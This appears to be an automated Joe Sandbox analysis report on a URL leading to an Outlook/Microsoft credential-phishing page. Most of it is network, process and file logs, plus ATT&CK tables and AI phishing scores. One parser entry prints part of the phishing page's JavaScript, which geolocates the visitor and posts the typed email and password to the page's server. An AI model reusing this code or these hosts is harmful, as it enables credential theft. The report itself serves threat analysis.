Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bu.marcel-andree.de/

Overview

General Information

Sample URL:https://bu.marcel-andree.de/
Analysis ID:1577022

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML body contains low number of good links
Javascript checks online IP of machine
No HTML title found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 2808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2016,i,17718913859551020210,5470142254317290983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bu.marcel-andree.de/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://log.the-network-expert.ca/Joe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is well-known and is associated with Microsoft., The legitimate domain for Outlook is 'outlook.com'., The provided URL 'log.the-network-expert.ca' does not match the legitimate domain for Outlook., The URL contains hyphens and an unusual domain structure, which is often indicative of phishing., The domain 'the-network-expert.ca' does not have any known association with Outlook or Microsoft., The presence of an input field for 'Email Address' is common in phishing attempts to capture user credentials. DOM: 1.2.pages.csv
Source: https://log.the-network-expert.ca/Joe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is well-known and is associated with Microsoft., The legitimate domain for Outlook is 'outlook.com'., The provided URL 'log.the-network-expert.ca' does not match the legitimate domain for Outlook., The URL contains hyphens and an unusual domain structure, which is often indicative of phishing., The domain 'the-network-expert.ca' does not have any known association with Outlook or Microsoft. DOM: 1.3.pages.csv
Source: https://log.the-network-expert.ca/Joe Sandbox AI: Score: 8 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'log.the-network-expert.ca' does not match the legitimate domain for Microsoft., The domain 'the-network-expert.ca' does not have any known association with Microsoft., The use of a subdomain 'log' and the structure of the URL suggest it could be a phishing attempt., The URL contains hyphens and an unusual domain structure, which are common in phishing URLs. DOM: 1.4.pages.csv
Source: https://log.the-network-expert.ca/HTTP Parser: Number of links: 0
Source: https://log.the-network-expert.ca/_next/static/chunks/pages/index-e91d7dfda78ecd72.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[332],{7276:(e,t,s)=>{(window.__next_p=window.__next_p||[]).push(["/",function(){return s(6993)}])},6993:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>c});var a=s(4848),n=s(6540),o=s(2505),l=s.n(o),i=s(9680),r=s.n(i);function c(){let[e,t]=(0,n.usestate)(""),[s,o]=(0,n.usestate)(""),[i,c]=(0,n.usestate)(""),[d,m]=(0,n.usestate)(!1),[u,_]=(0,n.usestate)(""),[h,g]=(0,n.usestate)(!1);(0,n.useeffect)(()=>{l().get("https://ipinfo.io/json?token=c3e87e382ddea7").then(e=>{let t=e.data.country;return l().get("https://restcountries.com/v3.1/alpha/".concat(t))}).then(e=>{c(e.data[0].name.common)}).catch(e=>{console.error("failed to fetch full country name:",e),_("failed to retrieve country information.")})},[]);let p=async t=>{if(t.preventdefault(),s.length>=5){g(!0);try{let t=await l().post("/api/send-email",{email:e,password:s,country:i});console.log("email sent successfully!",t.data.message),window.location.href="https://ne.abruis.io"}catch(e){console.error("f...
Source: https://log.the-network-expert.ca/HTTP Parser: HTML title missing
Source: https://log.the-network-expert.ca/HTTP Parser: HTML title missing
Source: https://log.the-network-expert.ca/HTTP Parser: HTML title missing
Source: https://log.the-network-expert.ca/HTTP Parser: HTML title missing
Source: https://log.the-network-expert.ca/HTTP Parser: HTML title missing
Source: https://bu.marcel-andree.de/HTTP Parser: No favicon
Source: https://bu.marcel-andree.de/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No favicon
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="author".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="author".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="author".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="author".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="author".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://log.the-network-expert.ca/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.18:49688 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.18:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.2:443 -> 192.168.2.18:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.16.158.48:443 -> 192.168.2.18:49750 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: global trafficDNS traffic detected: DNS query: bu.marcel-andree.de
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: log.the-network-expert.ca
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: restcountries.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.18:49688 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.18:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.2:443 -> 192.168.2.18:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.16.158.48:443 -> 192.168.2.18:49750 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@17/27@21/107
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2016,i,17718913859551020210,5470142254317290983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bu.marcel-andree.de/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2016,i,17718913859551020210,5470142254317290983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bu.marcel-andree.de/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
restcountries.com
146.190.198.121
truefalse
    high
    log.the-network-expert.ca
    76.76.21.21
    truetrue
      unknown
      ipinfo.io
      34.117.59.81
      truefalse
        high
        bu.marcel-andree.de
        76.76.21.21
        truefalse
          unknown
          www.google.com
          142.250.181.132
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://bu.marcel-andree.de/false
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              1.1.1.1
              unknownAustralia
              13335CLOUDFLARENETUSfalse
              172.217.17.78
              unknownUnited States
              15169GOOGLEUSfalse
              34.117.59.81
              ipinfo.ioUnited States
              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
              172.217.17.35
              unknownUnited States
              15169GOOGLEUSfalse
              172.217.17.46
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.181.132
              www.google.comUnited States
              15169GOOGLEUSfalse
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              146.190.198.121
              restcountries.comUnited States
              702UUNETUSfalse
              172.217.17.74
              unknownUnited States
              15169GOOGLEUSfalse
              172.217.21.35
              unknownUnited States
              15169GOOGLEUSfalse
              64.233.163.84
              unknownUnited States
              15169GOOGLEUSfalse
              76.76.21.21
              log.the-network-expert.caUnited States
              16509AMAZON-02UStrue
              IP
              192.168.2.18
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1577022
              Start date and time:2024-12-17 21:16:21 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Sample URL:https://bu.marcel-andree.de/
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              Analysis Mode:stream
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal48.phis.win@17/27@21/107
              • Exclude process from analysis (whitelisted): SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.163.84, 142.250.181.142
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: https://bu.marcel-andree.de/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 19:16:58 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2675
              Entropy (8bit):3.979675174744905
              Encrypted:false
              SSDEEP:
              MD5:8A266367B891F3F24919403308A21974
              SHA1:4942D712657F3D5CC66C6B8BB6A23C410851830E
              SHA-256:6E5381D2942E078273974F0B595D897EEC710E1BD2940124FD3138F239723389
              SHA-512:415AEF3E61E5E087D1899C0D165C817FC2D22C8F2528DE16D27E4F7C2A691A4D1341E251558105C1D2779284A571A8CA956DB0744493A4A0E4732687DE56525E
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,........P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y ......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 19:16:58 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.992830078769008
              Encrypted:false
              SSDEEP:
              MD5:A3811A443C2948F449075F37978DC588
              SHA1:A0E604C8907805908A934B9B567146ED34988CF3
              SHA-256:6AA97BAFDF57747B50DD24E2316EF1D762B9EC527D52DF3FCEE665077AC14561
              SHA-512:DFF8DA5BEF7500E0BB0786A1D7CDCB5B3A1D0A9CB4D0C18105DE1B58156E242E333331B31F80B3115680245977D7B864647C0CF13C8964877634B74ABDFBDE78
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....R...P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y ......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
